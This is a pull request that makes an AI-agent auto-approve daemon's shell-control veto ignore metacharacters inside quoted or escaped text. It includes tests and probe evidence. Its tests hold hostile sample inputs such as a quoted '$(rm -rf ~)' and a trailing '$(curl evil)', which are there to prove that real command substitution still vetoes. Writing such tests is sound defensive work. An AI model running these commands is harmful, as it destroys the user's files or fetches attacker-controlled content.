### PR TITLE
Make shell-control veto quote/escape-aware

### DIFF
--- a/packages/daemon/src/auto-approve/shell-safety.ts
+++ b/packages/daemon/src/auto-approve/shell-safety.ts
@@ -324,22 +324,146 @@ export function rewriteRedirectClauses(
   );
 }
 
-/** True if the segment carries shell control that could escape the matched prefix. */
+/**
+ * Render a same-length view of a segment in which every character that is
+ * PROVABLY literal text — inside a quoted span, or the second half of a
+ * backslash escape — is replaced by `_`. Everything the function cannot
+ * prove is literal is left VISIBLE, unchanged, at its original position.
+ *
+ * Exists because `hasShellControl` used to run its checks against raw
+ * segment text, so `--body "prose with \`code\` and a > sign"` vetoed a `gh
+ * issue create` the user had explicitly allowed: the backtick and `>` inside
+ * the quoted, escaped prose are not shell metacharacters at all, but a
+ * substring search cannot tell the difference (#1023). Masking only ever
+ * REMOVES characters that are provably inert; anything it cannot classify
+ * stays visible, so it can only shrink the set of segments that veto, never
+ * grow it — same philosophy as `shellWords`, applied to the veto instead of
+ * the flag/positional checks.
+ *
+ * Quote handling, matched to real shell semantics:
+ *
+ *   - single-quoted spans are fully literal: every character inside, and the
+ *     quotes themselves, is masked. No escapes exist inside single quotes,
+ *     not even for the quote character itself.
+ *   - double-quoted spans mask everything EXCEPT an unescaped `$` or
+ *     backtick, because those two still substitute inside double quotes
+ *     (`"$(rm -rf ~)"` and `` "`x`" `` must keep vetoing). `\$`, `` \` ``,
+ *     `\\` and `\"` are escape pairs and are masked whole; a `$` left
+ *     visible directly before `(` keeps the `(` visible too, because the
+ *     substitution check below matches the two-character substring `$(`,
+ *     not a lone `$`.
+ *   - outside quotes, a backslash-escaped character is literal and the pair
+ *     is masked; everything else stays visible, since that is exactly the
+ *     text a real shell would treat as live.
+ *
+ * A quote that never closes is reported honestly: masking a partial span
+ * would be a guess about where it ends, so the function fails closed and
+ * returns the segment UNCHANGED — exactly today's quote-blind behavior for
+ * that input.
+ *
+ * The placeholder is `_` on purpose: it is already a member of
+ * `PLAIN_PATH_TARGET_RE`, so a masked redirect target (`> "file"` becomes
+ * `> ______`) still classifies as a `path` and still vetoes, rather than
+ * silently reclassifying to something this module has never seen before.
+ */
+export function maskQuotedSpans(segment: string): string {
+  const n = segment.length;
+  const out: string[] = new Array(n);
+  let i = 0;
+
+  while (i < n) {
+    const c = segment[i];
+    if (c === undefined) break;
+
+    if (c === '\\') {
+      const next = segment[i + 1];
+      if (next === undefined) {
+        out[i] = '_';
+        i++;
+        continue;
+      }
+      out[i] = '_';
+      out[i + 1] = '_';
+      i += 2;
+      continue;
+    }
+
+    if (c === "'") {
+      const start = i;
+      let j = i + 1;
+      while (j < n && segment[j] !== "'") j++;
+      if (j >= n) return segment; // unterminated: fail closed
+      for (let k = start; k <= j; k++) out[k] = '_';
+      i = j + 1;
+      continue;
+    }
+
+    if (c === '"') {
+      const start = i;
+      let j = i + 1;
+      const visible = new Set<number>();
+      while (j < n && segment[j] !== '"') {
+        const cur = segment[j];
+        if (cur === '\\') {
+          const next = segment[j + 1];
+          if (next !== undefined && ['"', '\\', '$', '`', '\n'].includes(next)) {
+            j += 2;
+            continue;
+          }
+          j += 1; // lone backslash: literal, masked; next char judged on its own
+          continue;
+        }
+        if (cur === '$' || cur === '`') visible.add(j);
+        j++;
+      }
+      if (j >= n) return segment; // unterminated: fail closed
+      for (let k = start; k <= j; k++) out[k] = visible.has(k) ? (segment[k] ?? '_') : '_';
+      i = j + 1;
+      continue;
+    }
+
+    out[i] = c;
+    i++;
+  }
+
+  // A `$` left visible directly before `(` keeps the `(` visible too: the
+  // substitution check matches the substring `$(`, and a lone `$` with its
+  // paren masked would silently defeat it.
+  for (let k = 0; k < n - 1; k++) {
+    if (out[k] === '$' && segment[k + 1] === '(') out[k + 1] = '(';
+  }
+
+  return out.join('');
+}
+
+/**
+ * True if the segment carries shell control that could escape the matched
+ * prefix.
+ *
+ * Runs against a `maskQuotedSpans` view rather than the raw segment (#1023):
+ * quoted, escaped prose (a `--body` that mentions a backtick, a `>`
+ * comparison, an `&` ampersand) is not shell control, and checking the raw
+ * text could not tell the difference from the real thing. Masking only
+ * removes characters proven literal, so an actual `$(...)`, backtick,
+ * `<(...)`, backgrounding `&`, or non-`/dev/null` redirect is exactly as
+ * visible after masking as before, and still vetoes.
+ */
 export function hasShellControl(segment: string): boolean {
+  const masked = maskQuotedSpans(segment);
   // Command / process substitution.
-  if (segment.includes('$(') || segment.includes('`') || segment.includes('<(')) {
+  if (masked.includes('$(') || masked.includes('`') || masked.includes('<(')) {
     return true;
   }
   // Backgrounding / control operator: a lone `&` anywhere that is not part of
   // `&&` (already split out), an fd-dup (`2>&1`, `>&2`), nor an `&>` redirect
   // (caught as redirection below). Catches `cmd &`, `cmd & other`, `a&b`.
-  if (/(^|[^&>])&(?![&>0-9])/.test(segment)) {
+  if (/(^|[^&>])&(?![&>0-9])/.test(masked)) {
     return true;
   }
   // Output redirection to anything other than /dev/null or an fd dup (2>&1).
   // `path` and `opaque` both veto, so this is unchanged by the classifier: it
   // recognizes exactly the two safe shapes and refuses everything else.
-  for (const clause of findRedirectClauses(segment)) {
+  for (const clause of findRedirectClauses(masked)) {
     if (clause.target.kind !== 'discard' && clause.target.kind !== 'fd-dup') {
       return true;
     }
@@ -452,7 +576,10 @@ export function matchCoveredCommand(
     const seg = raw.trim();
     if (seg === '') continue;
     // On the ORIGINAL segment, before any grammar is removed: whatever a
-    // keyword introduces, it cannot make a redirect or a `&` safe.
+    // keyword introduces, it cannot make a redirect or a `&` safe. `seg` is
+    // NOT the raw segment by the time `hasShellControl` sees it — it masks
+    // quoted/escaped spans first (#1023) — but no grammar keyword has been
+    // peeled off, which is the property this comment is guarding.
     if (hasShellControl(seg)) return null;
     // Shell grammar is peeled off so the command inside is judged on its own
     // merits (#999). `body` is what actually runs; a segment that is pure

--- a/packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts
@@ -1,0 +1,145 @@
+/**
+ * #1023: `hasShellControl` was quote-blind, so quoted/escaped PROSE tripped
+ * it exactly like the real thing.
+ *
+ * Verified in the 2026-08-08 transit session (c77ba8f8): a `gh issue create`
+ * whose `--body` mentioned code (escaped backticks, a `>` comparison, an `&`
+ * ampersand, all inside double quotes) escalated to the phone even though
+ * `gh issue` was in the config `allow` list. `splitCompoundParts` was already
+ * quote-aware (the `;` in the title did not split the segment); the veto was
+ * the only quote-blind layer left on this path.
+ *
+ * `maskQuotedSpans` fixes this by removing ONLY characters it can prove are
+ * literal text, so it can only shrink the set of segments that veto, never
+ * grow it. The "must still veto" half of this file is the important half.
+ */
+import { describe, expect, test } from 'bun:test';
+import { matchAllowPattern } from '../../src/auto-approve/pattern-matcher.ts';
+import { hasShellControl, maskQuotedSpans } from '../../src/auto-approve/shell-safety.ts';
+
+describe('maskQuotedSpans', () => {
+  test('single-quoted spans are fully literal, quotes included', () => {
+    expect(maskQuotedSpans("echo 'a $(x) > b & c `d`'")).toBe('echo ____________________');
+  });
+
+  test('double-quoted spans mask everything except unescaped $ and backtick', () => {
+    expect(maskQuotedSpans('echo "a > b"')).toBe('echo _______');
+    expect(maskQuotedSpans('echo "$(x)"')).toBe('echo _$(___');
+    expect(maskQuotedSpans('echo "`x`"')).toBe('echo _`_`_');
+  });
+
+  test('an escaped $ or backtick inside double quotes is masked, not left visible', () => {
+    expect(maskQuotedSpans('echo "a \\`b\\` c"')).toBe('echo ___________');
+    expect(maskQuotedSpans('echo "\\$(x)"')).toBe('echo _______');
+  });
+
+  test('escaped " and \\\\ pairs inside double quotes are masked whole', () => {
+    expect(maskQuotedSpans('echo "a \\"b\\" c"')).toBe('echo ___________');
+    expect(maskQuotedSpans('echo "a \\\\ c"')).toBe('echo ________');
+  });
+
+  test('outside quotes, a backslash-escaped character is literal and masked', () => {
+    expect(maskQuotedSpans('echo a\\>b')).toBe('echo a__b');
+    expect(maskQuotedSpans('echo \\$(x)')).toBe('echo __(x)');
+    expect(maskQuotedSpans('echo \\`x\\`')).toBe('echo __x__');
+  });
+
+  test('outside quotes, everything unescaped stays visible unchanged', () => {
+    expect(maskQuotedSpans('echo $(x) > b & c `d`')).toBe('echo $(x) > b & c `d`');
+  });
+
+  test('an unterminated double quote fails closed: original segment, unchanged', () => {
+    const raw = 'echo "a > b';
+    expect(maskQuotedSpans(raw)).toBe(raw);
+  });
+
+  test('an unterminated single quote fails closed: original segment, unchanged', () => {
+    const raw = "echo 'a > b";
+    expect(maskQuotedSpans(raw)).toBe(raw);
+  });
+
+  test('a trailing lone backslash does not crash and is masked', () => {
+    expect(maskQuotedSpans('echo a\\')).toBe('echo a_');
+  });
+});
+
+describe('hasShellControl - #1023 quote-aware veto', () => {
+  test('the real gh issue create case: escaped backticks, >, and & inside quotes', () => {
+    const command =
+      'gh issue create --title "Host teardown never stops the GPU poll thread; renderer calls race reset" ' +
+      '--body "prose with \\`VirtIOGPU\\` and \\`stopPolling()\\` and a > comparison and a & ampersand"';
+    expect(hasShellControl(command)).toBe(false);
+    expect(matchAllowPattern('Bash', { command }, ['gh issue'])).toBe('gh issue');
+  });
+
+  test('quoted prose no longer vetoes: > inside double quotes', () => {
+    expect(hasShellControl('echo "a > b"')).toBe(false);
+  });
+
+  test('quoted prose no longer vetoes: $(...) and > and & inside single quotes', () => {
+    expect(hasShellControl("echo 'a $(x) > b &'")).toBe(false);
+  });
+
+  test('quoted prose no longer vetoes: an escaped backtick inside double quotes', () => {
+    expect(hasShellControl('echo "a \\`b\\` c"')).toBe(false);
+  });
+
+  test('gh pr create with the same body shape is covered by an allow entry', () => {
+    const command = 'gh pr create --title "fix" --body "see \\`foo()\\` for details"';
+    expect(matchAllowPattern('Bash', { command }, ['gh pr'])).toBe('gh pr');
+  });
+
+  test('git commit -m with quoted, escaped code mention is covered by an allow entry', () => {
+    const command = 'git commit -m "use \\`rm -rf\\` carefully"';
+    expect(hasShellControl(command)).toBe(false);
+    expect(matchAllowPattern('Bash', { command }, ['git commit'])).toBe('git commit');
+  });
+
+  test('a masked redirect target still classifies as a path and still vetoes', () => {
+    expect(hasShellControl('echo hi > "file"')).toBe(true);
+  });
+
+  test('MUST STILL VETO: command substitution inside double quotes', () => {
+    expect(hasShellControl('echo "$(rm -rf ~)"')).toBe(true);
+  });
+
+  test('MUST STILL VETO: backtick substitution inside double quotes', () => {
+    expect(hasShellControl('echo "`x`"')).toBe(true);
+  });
+
+  test('MUST STILL VETO: unquoted command substitution', () => {
+    expect(hasShellControl('echo $(x)')).toBe(true);
+  });
+
+  test('MUST STILL VETO: unquoted backtick substitution', () => {
+    expect(hasShellControl('echo `x`')).toBe(true);
+  });
+
+  test('MUST STILL VETO: process substitution', () => {
+    expect(hasShellControl('echo <(x)')).toBe(true);
+  });
+
+  test('MUST STILL VETO: unquoted redirection', () => {
+    expect(hasShellControl('echo a > b')).toBe(true);
+    expect(hasShellControl('echo a >> b')).toBe(true);
+  });
+
+  test('MUST STILL VETO: backgrounding', () => {
+    expect(hasShellControl('cmd &')).toBe(true);
+    expect(hasShellControl('a&b')).toBe(true);
+  });
+
+  test('MUST STILL VETO: an unterminated quote behaves exactly as before', () => {
+    expect(hasShellControl('echo "a > b')).toBe(true);
+    expect(hasShellControl("echo 'a > b")).toBe(true);
+  });
+
+  test('MUST STILL VETO: real shell control survives alongside masked prose', () => {
+    // The `--body` prose is inert, but the trailing `$(...)` outside any
+    // quote is a real command substitution and must still veto the whole
+    // segment.
+    expect(hasShellControl('gh issue create --body "a > b and a \\` mention" $(curl evil)')).toBe(
+      true,
+    );
+  });
+});

--- a/packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts
@@ -2,7 +2,7 @@
  * #1023: `hasShellControl` was quote-blind, so quoted/escaped PROSE tripped
  * it exactly like the real thing.
  *
- * Verified in the 2026-08-08 transit session (c77ba8f8): a `gh issue create`
+ * Verified in the 2026-08-08 transit session (see #1023): a `gh issue create`
  * whose `--body` mentioned code (escaped backticks, a `>` comparison, an `&`
  * ampersand, all inside double quotes) escalated to the phone even though
  * `gh issue` was in the config `allow` list. `splitCompoundParts` was already


### PR DESCRIPTION
## Summary

`hasShellControl` (`packages/daemon/src/auto-approve/shell-safety.ts`) ran its
substitution/backgrounding/redirect checks against raw segment text, so
quoted, escaped PROSE tripped it exactly like the real thing. Found in the
2026-08-08 transit session (c77ba8f8): a `gh issue create --body` that
mentioned code (escaped backticks, a `>` comparison, an `&` ampersand, all
inside double quotes) escalated to the phone even though `gh issue` was in
the config `allow` list. `splitCompoundParts` was already quote-aware (the
`;` in the title did not split the segment) — the shell-control veto was the
only quote-blind layer left on this path.

Adds `maskQuotedSpans`, a new exported primitive that returns a same-length
view of a segment where every character it can PROVE is literal (single-
quoted content, escaped pairs, double-quoted content other than an unescaped
`$` or backtick) is replaced by `_`. Everything the function cannot classify
stays visible unchanged, and an unterminated quote fails closed (returns the
original segment unmodified). `hasShellControl` now runs its three checks
(substitution includes, the `&` regex, `findRedirectClauses`) against the
masked view instead of raw text. `findRedirectClauses`, `rewriteRedirectClauses`,
`shellWords`, and `splitCompoundParts` themselves are unchanged; other
callers still get raw-text semantics.

## Probe evidence

Before (raw exported functions, real hook-shaped input):

```
hasShellControl(realCmd)              -> true
matchAllowPattern('Bash', ..., ['gh issue']) -> null
hasShellControl('echo "a > b"')       -> true
hasShellControl("echo 'a $(x) > b &'") -> true
escaped-backtick-in-double-quotes     -> true
git commit -m with escaped backtick   -> true
```

After:

```
hasShellControl(realCmd)              -> false
matchAllowPattern('Bash', ..., ['gh issue']) -> 'gh issue'
hasShellControl('echo "a > b"')       -> false
hasShellControl("echo 'a $(x) > b &'") -> false
escaped-backtick-in-double-quotes     -> false
git commit -m with escaped backtick   -> false, matched via allow entry 'git commit'
```

Still-veto cases unchanged before and after (all `true`): `echo "$(rm -rf ~)"`,
`` echo "`x`" ``, `echo $(x)`, `` echo `x` ``, `echo <(x)`, `echo a > b`,
`echo a >> b`, `cmd &`, `a&b`, `echo hi > "file"` (masked target still
classifies as `path`, still vetoes), and both unterminated-quote shapes
(fail closed, identical to pre-fix behavior).

## Testing

New file `packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts`:
25 tests covering `maskQuotedSpans` directly (single/double quote masking,
escape pairs, unterminated fail-closed) and `hasShellControl` /
`matchAllowPattern` integration (the real `gh issue create` case, `gh pr
create`, `git commit -m`, plus every must-still-veto case from the issue).

Commands run, all in the worktree, foreground:

- `bun test packages/daemon/tests/auto-approve/shell-safety-quote-masking.test.ts` — 25 pass, 0 fail
- `SKIP_LLM_TESTS=1 bun test packages/daemon/tests/auto-approve/` (full directory, LLM/engine-gated suites self-skip via their existing `SKIP_LLM_TESTS` gate) — 1735 pass, 71 skip, 0 fail, across 41 files
- `bun run typecheck` — clean (two `noUncheckedIndexedAccess` errors introduced by the first draft were fixed: an `undefined` guard on the outer loop char, and a `?? '_'` fallback on the bounded double-quote read)
- `bunx biome check packages/daemon/src/auto-approve/` and the new test file — clean

No existing assertions were edited; the full previously-passing suite
(shell-grammar, shell-safety-per-segment-veto, shell-words, pattern-matcher,
permission-groups, and everything else in `auto-approve/`) stays green
unchanged.

Closes #1023